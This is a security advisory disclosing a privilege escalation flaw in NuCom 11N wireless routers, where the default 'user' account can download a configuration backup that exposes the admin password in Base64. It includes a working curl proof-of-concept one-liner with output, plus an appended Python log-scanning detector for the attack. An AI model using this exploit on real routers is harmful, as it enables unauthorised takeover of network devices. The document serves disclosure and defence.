NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation

Published: 2021-03-10 00:00:00
Author: Gjoko Krstic
Source: zeroscience.mk

AI Score: 7.5 High (Confidence: Low)

Title: NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation
Advisory ID: ZSL-2021-5629
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 10.03.2021

Summary

The NC routers upgrade your network to the next generation of WiFi. With combined wireless speeds of up to 1750 Mbps, the device provides better speeds and wireless range. Includes 2 FXS ports for any VoIP service. If you prefer a wired connection, the NC routers have gigabit ports to provide an incredibly fast, lag-free experience. 3.0 ports allow you to power a robust home Internet network by sharing printers, flash storage, FTP servers, or media players.

Description

The application suffers from a privilege escalation vulnerability. The non-privileged default user (user:user) can escalate privileges by sending an HTTP GET request to the configuration backup endpoint, which discloses the HTTP super password (the admin credentials) as a Base64-encoded value. Once authenticated as admin, an attacker is granted access to the additional, privileged pages.

Vendor

NUEVAS COMUNICACIONES IBERIA, S.A. - <https://www.nucom.es>

Affected Version

5.07.90_multi_NCM01
5.07.89_multi_NCM01
5.07.72_multi_NCM01

Tested On

GoAhead-Webs
Tenda

Vendor Status

[01.03.2021] Vulnerability discovered.
[08.03.2021] Vendor contacted.
[09.03.2021] No response from the vendor.
[10.03.2021] Public security advisory released.

PoC

nucomrouter_privesc.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/161745>
[2] <https://www.exploit-db.com/exploits/49634>
[3] <https://cxsecurity.com/issue/WLB-2021030061>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/198068>

Changelog

[10.03.2021] - Initial release
[11.03.2021] - Added reference [1], [2] and [3]
[12.03.2021] - Added reference [4]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation


Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.
Product web page: https://www.nucom.es
Affected version: 5.07.90_multi_NCM01
                  5.07.89_multi_NCM01
                  5.07.72_multi_NCM01

Summary: The NC routers upgrades your network to the next
generation of WiFi. With combined wireless speeds of up to
1750 Mbps, the device provides better speeds and wireless
range. Includes 2 FXS ports for any VoIP service. If you
prefer a wired connection, the NC routers have gigabit
ports to provide an incredibly fast, lag-free experience.
3.0 ports allow you to power a robust home Internet network
by sharing printers, flash storage, FTP servers, or media
players.

Desc: The application suffers from a privilege escalation
vulnerability. The non-privileged default user (user:user)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint and disclose the http
super password (admin credentials) in Base64 encoded value.
Once authenticated as admin, an attacker will be granted
access to the additional and privileged pages.

Tested on: GoAhead-Webs
           Tenda


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5629
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php


01.03.2021

--


lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \
> grep -oP '(?<=http_supper_passwd=).*' | \
> base64 -d 2>/dev/null | \
> xargs echo -n ; \
> echo -e '\n-----------\n'
The admin password is: 
MammaMia123
-----------

lqwrm@metalgear:~/prive$
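A detection check for the request shown in the PoC, added here as an example and not part of the original advisory: it scans HTTP request logs for downloads of the configuration backup made with a low-privileged session. The log layout, the sample lines and the function names are assumptions; the rule that an `ecos_pw` value of Base64 text plus digits identifies the `user` login is inferred from the single cookie in the PoC.

```python
import base64
import re
from urllib.parse import urlsplit

# Endpoint path and cookie name are taken from the PoC; the log layout is assumed.
BACKUP_PATH = "/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg"
LOW_PRIV = ("user",)  # default non-privileged credential named in the advisory
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "GET (?P<url>\S+)" cookie="(?P<cookie>[^"]*)"$'
)

# Constructed sample lines (hypothetical proxy log that records the Cookie header).
SAMPLE_LOG = """\
2021-03-01T10:02:11Z 192.168.0.23 "GET /index.asp" cookie="ecos_pw=dXNlcg==1311930653:language=en"
2021-03-01T10:02:40Z 192.168.0.23 "GET /cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251" cookie="ecos_pw=dXNlcg==1311930653:language=en"
2021-03-01T11:15:02Z 192.168.0.5 "GET /cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.77" cookie="ecos_pw=QWRtMW4hcHc=5550001:language=en"
"""


def is_low_priv_session(cookie):
    """True if ecos_pw is Base64(<low-priv credential>) followed only by digits."""
    for part in re.split(r"[:;]\s*", cookie):
        name, _, value = part.partition("=")
        if name.strip() != "ecos_pw":
            continue
        for cred in LOW_PRIV:
            token = base64.b64encode(cred.encode()).decode()
            if re.fullmatch(re.escape(token) + r"\d*", value):
                return True
    return False


def find_backup_pulls(lines):
    """Return (timestamp, source) for low-privileged requests to the backup endpoint."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # Compare the path only, so the random= query string cannot hide the request.
        if urlsplit(m.group("url")).path != BACKUP_PATH:
            continue
        if is_low_priv_session(m.group("cookie")):
            hits.append((m.group("ts"), m.group("src")))
    return hits


if __name__ == "__main__":
    for ts, src in find_backup_pulls(SAMPLE_LOG.splitlines()):
        print(f"{ts} low-privileged session from {src} downloaded {BACKUP_PATH}")
```

A hit means the admin password stored in that backup should be treated as exposed and rotated.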
